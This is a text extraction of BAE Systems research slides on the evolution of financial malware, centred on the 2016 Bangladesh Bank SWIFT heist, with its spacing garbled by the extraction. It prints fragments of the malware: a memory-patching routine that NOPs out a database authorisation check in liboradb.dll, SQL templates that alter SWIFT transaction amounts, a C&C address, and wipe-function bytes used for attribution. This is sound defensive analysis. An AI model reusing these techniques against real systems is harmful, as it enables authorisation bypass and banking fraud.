1 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
BAE$SystemsThe$evolution$of$financial$malware$– Bangladesh$Bank$Heist$Case$StudySergei+Shevchenko+(Security+Researcher,+ BAE+Systems+Applied+Intelligence)
3 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.
.data:0040F818+20+32+30+3A+20+54+72+61+a20Transactio_0+db+'+20:+Transaction',0+;+DATA+XREF:+sub_406B40
.data:0040F83C+46+45+44+45+52+41+4C+20+Str+++++++++++++db+'FEDERAL+RESERVE+BANK',0
.data:0040F8A4+46+49+4E+20+39+30+30+20+aFin900Confirma+db+'FIN+900+Confirmation+of+Debit',0
.data:0040F8EC+63+6D+64+2E+65+78+65+20+aCmd_exeCEchoEx+db+'cmd.exe+/c+echo+exit+|+"%s"+VS+/+as+sysdba+@%s+>+"%s"',0
.data:0040F484+53+45+4C+45+43+54+20+4D+aSelectMesg_fin+db+'SELECT+MESG_FIN_CCY_AMOUNT+FROM+SAAOWNER.MESG_%s+WHERE+MESG_S_UMI‘
.data:0040F484+43+43+59+5F+41+4D+4F+55+ db+'D+=+',27h,'%s',27h,';',0
.data:0040F18C+6C+69+62+6F+72+61+64+62+aLiboradb_dll+++db+'liboradb.dll',0 ;+DATA+XREF:+patch_liboradb_dll+F2o
.data:0040F0D4+41+6C+6C 69+61+6E+73+00+aAllians db+'Allians',0 ;+DATA+XREF:+make_paths+32o
.data:0040F220+53+45+4C+45+43+54+20+43+aSelectC_text_s+db+'SELECT+C.TEXT_S_UMID+FROM+(SELECT+A.TEXT_S_UMID,+A.TEXT_DATA_BLOC‘
.data:0040F220+54+20+41+2E+54+45+58+54+ db+' =+B.MESG_S_UMID+AND+B.MESG_SENDER_SWIFT_ADDRESS+LIKE+',27h,'%%%s%%',27h
.data:0048F478+25+2E+32+49+36+34+64+00 a_2i64d+++++++++db+'%.2I64d',0 ;+DATA+XREF:+sub_45A500+6Fo
.data:0048F480+4D+61+00++ aMa db+'Ma',0 ;+DATA+XREF:+sub_45A760+9Ao
.data:0048F483+00 align+43A+20+53+74+61+74+65+6D+aStatementLine++db+':+Statement+Line',0 ;+DATA+XREF:+sub_45A760+5Co00+00+00+ align+443+6C+6F+73+69+6E+67+20+aClosingBalance+db+'Closing+Balance+(Booked+Funds)',0
.data:0048F498+42+61+6C+61+6E+63+65+20+++++++++++++++++++++++++++++++++++++++++;+DATA+XREF:+sub_45A880+5Do
.data:0048F4B8+50+4F+53+5F+54+45+4D+50+aPos_temp+++++++db+'POS_TEMP',0+++++++++;+DATA+XREF:+sub_45A880+36o
.data:0048F4B8+00+ ;+sub_45A880+109o+...
.data:0048F4C4+2D+2D 2D 2D 2D 2D 2D 2D+asc_48F4C4++++++db+'VVVVVVVVVVVVVVVVVVVVV',0
.data:0048F4C4+2D+2D 2D 2D 2D 2D 2D 2D++ ;+DATA+XREF:+sub_45A9C0+D1o
.data:0048F4C4+2D+2D 2D 2D 2D 00 ;+sub_45B630+1A0o
.data:0048F4DC+20+4F+70+65+6E+69+6E+67+aOpeningBalance+db+'+Opening+Balance',0+;+DATA+XREF:+sub_45AAE0:loc_45AAFBo
.data:0048F4ED+00+00+00 align+10h
.data:0048F4F0+53+65+6E+64+65+72+00 aSender db+'Sender',0+++++++++++;+DATA+XREF:+sub_45AB80:loc_45ABA0o
.data:0048F4F7+00 align+4
.data:0048F4F8+23+25+73+23+00+ aS_5++++++++++++db+'#%s#',0+++++++++++++;+DATA+XREF:+sub_45AC00+117o
.data:0048F4FD+00+00+00+ align+10h
.data:0048F500+3A+20+44+65+62+69+74+00 aDebit_0++++++++db+':+Debit',0++++++++++;+DATA+XREF:+sub_45AC00+E5o
.data:0048F508+3A+20+43+72+65+64+69+74+aCredit+++++++++db+':+Credit',0+++++++++;+DATA+XREF:+sub_45AC00+CEo
.data:0048F508+00+ ;+sub_45AC00+234o+...
.data:0048F511+00+00+00 align+4
.data:0048F514+20+44+65+62+69+74+00 aDebit db+'+Debit',0+++++++++++;+DATA+XREF:+sub_45AC00+94o
.data:0048F51B+00 align+4
.data:0048F51C+50+4F+53+5F+50+41+47+45+aPos_page_start+db+'POS_PAGE_START',0+++;+DATA+XREF:+sub_45B210+51o
.data:0048F51C+5F+53+54+41+52+54+00 ;+sub_45B210+E0o+...
.data:0048F52B+00+ align+4
.data:0048F52C+20+43+72+65+64+69+74+00+aCredit_0+++++++db+'+Credit',0++++++++++;+DATA+XREF:+sub_45B3D0+DAo
.data:0048F534+3A+20+43+6C+6F+73+69+6E+aClosingAvailBa+db+':+Closing+Avail+Bal+(Avail+Funds)',0
.data:0048F534+67+20+41+76+61+69+6C+20+ ;+DATA+XREF:+sub_45B630+261o
.data:0048F556+00+00+++++++++++++++++++++++++++++++++++align+4
.data:0048F558+4D+65+73+73+61+67+65+20+aMessageTrailer+db+'Message+Trailer',0 ;+DATA+XREF:+sub_45B630+1F8o
.data:0048F568+4D+65+73+73+61+67+65+20+aMessageText++++db+'Message+Text',0+ ;+DATA+XREF:+sub_45B630+1E2o
.data:0048F575+00+00+00 align+4
.data:0048F578+4D+65+73+73+61+67+65+20+aMessageHeader++db+'Message+Header',0+++;+DATA+XREF:+sub_45B630+1CCo
.data:0048F587+00 align+4
.data:0048F588+49+6E+73+74+61+6E+63+65+aInstanceTypeAn+db+'Instance+Type+and+Transmission',0
.data:0048F588+20+54+79+70+65+20+61+6E+ ;+DATA+XREF:+sub_45B630+1B6o
.data:0048F588+64+20+54+72+61+6E+73+6D+ ;+PARSE_PDF:loc_45BBC0o
<rpcgroup>..<rpci>..*/bbw/cmserver/*..217.172.177. 12/redirect.php..<ssq>1</ssq>
Sergei$Shevchenko,$Cyber$Security$Research
The+Evolution+of+Financial+MalwareBangladesh+Bank+Heist+Case+Study
5 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
1/3+out+of+10+mln websites+run+CMS
31,581 PLUGINS
>100+VULNERABILITIESFIXED+SINCE+2008
7 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Organised+Cyber+Crime˃Targeting+Different+Levels+of+the+Society
Ordinary+PeopleZeuS/CarberpDridex/Dyre
8 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
The+Rise+of+POS+Malware˃ATM+Malware
Early+signs+of+such+diversification+efforts+were+noticed+back+in+2009
Insiders+or+corrupt+technical+support+employees+infected+a+number+of+Diebold ATMs+(running+Windows+XP),+allowing+the+attackers+to+instruct+the+infected+ATMs+to+dispense+cash.
9 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
The+Rise+of+POS+Malware˃POS+Malware+(BlackPOS etc.)
10 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Organised+Cyber+Crime˃Targeting+Different+Levels+of+the+Society
ATM/POSATM/POS+Malware
11 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
2015:+Carbanak,+an+attack+from+inside˃Attack+against+a+Bank+Infrastructure
In+2015,+a+new+breed+of+malware,+Carbanak,+was+found+and+reported+by+Kaspersky+Lab.
The+malware+and+the+group+of+attackers+behind+it+were+able+to+compromise+up+to+100+financial+institutions+from+the+inside.+
Not+only+did+they+manage+to+steal+information+about+thousands+or+private+customers,+but+they+were+also+able+to+remotely+instruct+ATMs+to+dispense+cash,+leading+to+substantial+financial+losses.
12 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Organised+Cyber+Crime˃Targeting+Different+Levels+of+the+Society
Bank InfrastructureCarbanak
13 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Life+imitating+ArtHOLLYWOOD $(2001)
CYBER $ SPACE $ (2016)
$150M
$951M
14 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
US+BANK Compromised+BankCorr.+Account
Schematics+of+Cyber+Heist˃Compromised+Bank+Operation
Offshore+Bank
15 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
US+BANK Compromised+BankCorr.+Account
Offshore+Bank
Schematics+of+Cyber+Heist˃Compromised+Bank+Operation
16 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Bangladesh+Bank+Heist˃Patch
3.+Malware+checks+to+see+if+any+processes+have+‘liboradb.dll’+module+loaded
4.+If+found,+it+overwrites+2+bytes+at+a+specific+offset with+‘do+nothing’+(0x90+ NOP)+instructions
5.+Overwritten+bytes+forces+the+host+application+to+always+pass+the+validity+check
6.+The+malware+is+now+able+to+execute+database+transactions
if (VirtualProtectEx(hProcess, lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&hProcess)&& ReadProcessMemory(hProcess, lpAddr, &buffer, 2, &dwRead))
{if (bPatch){
if ((WORD)buffer == JNZ)res = WriteProcessMemory(hProcess, lpAddr, &NOPs, 2, &dwWritten);
}else{
if ((WORD)buffer == NOPs)res = WriteProcessMemory(hProcess, lpAddr, &JNZ, 2, &dwWritten);
}if (res)
VirtualProtectEx(hProcess, lpAddr, 2, hProcess, &flOldProtect);}
.data:0040F170 NOPs db 90h
.data:0040F171 db 90h
.data:0040F174 JNZ db 75h
.data:0040F175 db 4
17 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Bangladesh+Bank+Heist˃Patch+Result
85 C0 test eax, eax ; DB authorisation check75 04 jnz failed ; if failed, jump to 'failed' label below33 c0 xor eax, eax ; otherwise, set result to 0 (success)eb 17 jmp exit ; and then exit
failed:B8 01 00 00 00 mov eax, 1 ; set result to 1 (failure)
85 C0 test eax, eax ; DB authorisation check90 nop ; 'do nothing' in place of 0x7590 nop ; 'do nothing' in place of 0x0433 c0 xor eax, eax ; always set result to 0 (success)eb 17 jmp exit ; and then exit
failed:B8 01 00 00 00 mov eax, 1 ; never reached: set result to 1 (failure)
Original+Code:
Patched+Code:
18 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Bangladesh+Bank+Heist˃Patch
?Authorised?
NO
YES
Full+Access
DataBase
Do$Nothing
Do$Nothing
19 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Bangladesh+Bank+Heist˃Replacing+the+2+bytes+affects+8+bits+only
= 1090 9075 04 1 0 0 0 0 0 0 010 01 01 01 01 0110
What’s+easier+to+flip?+This?
Or+this?
20 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Bangladesh+Bank+Heist˃SQL+queries
UPDATE+SAAOWNER.MESG_%s+SET MESG_FIN_CCY_AMOUNT =+'%s'+WHERE+MESG_S_UMID+=+'%s'mUPDATE+SAAOWNER.TEXT_%s+SET+TEXT_DATA_BLOCK+=+UTL_RAW.CAST_TO_VARCHAR2('%s')+WHERE+TEXT_S_UMID+=+'%s'm
Monitoring+Login/Logout+events+in+the+journal:SELECT+*+FROM+(SELECT+JRNL_DISPLAY_TEXT,+JRNL_DATE_TIME FROM+SAAOWNER.JRNL_%s+WHERE+JRNL_DISPLAY_TEXT LIKE+'%%LT+BBHOBDDHA:+Log%%'+ORDER+BY+JRNL_DATE_TIME+DESC)+A+WHERE+ROWNUM+=+1m
‘BBHOBDDH’ is+the+SWIFT+code+for+the+Bangladesh+Bank+in+Dhaka
GET:+[C&C_server]/al?tttO
Manipulating+balances+(The+amount+of+Convertible+Currency):
Sending+‘doctored’+(manipulated)+SWIFT+confirmation+messages for+local+printing:
22 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Cyber+Heist:+Vietnam+
Received+PDF+Statement
XML+FileRead+blocks+onetbytoneIgnore+blocks+with+MESSAGE_FILENAME
Modified+PDF+FilePass+Modified+PDF+File+ to+FoxIT Reader
User+opens+the+Modified+PDF+File
User+opens+the+PDF+File
Trojan+reads+PDF+FileConverts+into+XML
Trojan+reads+XMLConverts+into+PDF
Temporary+File
PDFPDF
PDFSWIFT+Service+Bureau+(was not+compromised)
Fraudulent+Requests
24 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Attribution+cluesDistinctive+2tstep+‘wipetout’+and+‘filetdelete’+functions:
ttt>+which+led+to+a+further+sample: msoutc.exe$ –c6eb8e46810f5806d056c4aa34e7b8d8a2c37cad
25 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
AttributionWipeout+function(msoutc.exe,+2014)
Wipetout+function(Vietnam+malware,+2015)
B820100000E8B64E0000535557FF150090400050FF154C90400083C404C644240CFFFF156890400025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF15A4AC40008BE883FDFF7510FF151C9040005F5D5B81C420100000C3566A02536AFF55FF15D4AC40008D4C242453518D5424386A015255FF15ACAC400055FF15C8AC4000
1EFFFFFF55FF15A8AC40008B9424341000005352E847FDFFFF83C4085E5F5D5B
B820100000E896EA0400535557FF154CF0450050FF152CF1450083C404C644240CFFFF1524F1450025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF1548F045008BE883FDFF7510FF1508F045005F5D5B81C420100000C3566A02536AFF55FF1544F045008D4C242453518D5424386A015255FF1540F0450055FF153CF04500
1EFFFFFF55FF1510F045008B9424341000005352E847FDFFFF83C4085E5F5D5B
B64E00 96EA0400 4C9040 F0454C9040 2CF145
689040 24F145
A4AC40 48F0451C9040 08F045
D4AC40 44F045ACAC40 40F045C8AC40 3CF045
A8AC40 10F045
26 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Attribution
US+Cert+Alert PwC msoutc.exe
FwtSqmSession106829323_S-1-5-19
FwtSqmSession106829323_S-1-5-19
FwtSqmSession106839323_S-1-5-20
y0uar3@s!llyid!07,ou74n60u7f001
y@s!11yid60u7f!07ou74n001
y@s!11yid60u7f!07ou74n001
DEC JAN FEB MAR APR
CompiledCompiled Discovered Discovered
Event EventVietnam
Vietnam
Bangladesh
Bangladesh
Tien PhongBank:Heist+Attempt
BangladeshBank+Heist
Foxit Reader.exemspdclr.exe
evtsys.exeevtdiag.exenroff_b.exe
Foxit Reader.exemspdclr.exe
evtsys.exeevtdiag.exenroff_b.exe
Vietnam Bangladesh
Trojanised+Foxit Reader/SWIFT+Message+Cleaner Main+Malware+used+in+Bangladesh+Heist
2015+++++2016
4tDect2015
8tDect2015
16tDect201522tDect2015 4tFebt2016/
5tFebt201628tFebt2016 25tMart2016
28 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Timeline+of+the+attacks:+Group+#1+(Unknown)
Late$2014$Z 2015Malware:• exe+compiled+from+Python+scripts:
• pyinstaller generated+exe+files• python+scripts+fetch/execute+ shellcode
• ‘legit’+remote+access+tools• ‘Atelier+Web+Remote+Commander’• ‘Anyplace+Control’
• ‘legit’+Veil+Framework
Ecuador
29 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Timeline+of+the+attacks:+Group+#2+(Lazarus)
Vietnam:$December$2015
Malware:
• Manipulation+of+the+PDF+statements+from+the+bank’s+Service+Bureau
Vietnam
30 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Timeline+of+the+attacks:+Group+#2+(Lazarus)
Bangladesh:$February$2016
Malware:• SWIFT+messages+manipulation• Compromises+SWIFT+Alliance+Software• Direct+DB+manipulation
Bangladesh
31 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+
Timeline+of+the+attacks:+Group+#3+(Carbanak)April$2016
Infection+Vector:• SpeartPhishing,+RIG+Exploit+KitMalware:• MBR+code,+wipes+out+HDD• Backdoor+Shellcode,+port+8888+(open+source)• “Toshliph”:+links+to+CarbanakTargets:• ATMs• Etpayment+systems• onlinetbanking
Ukraine
Hong$Kong
Taiwan(China)
Thailand
32 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.
We’re+now+working+with+SWIFT+to+investigate+new+cases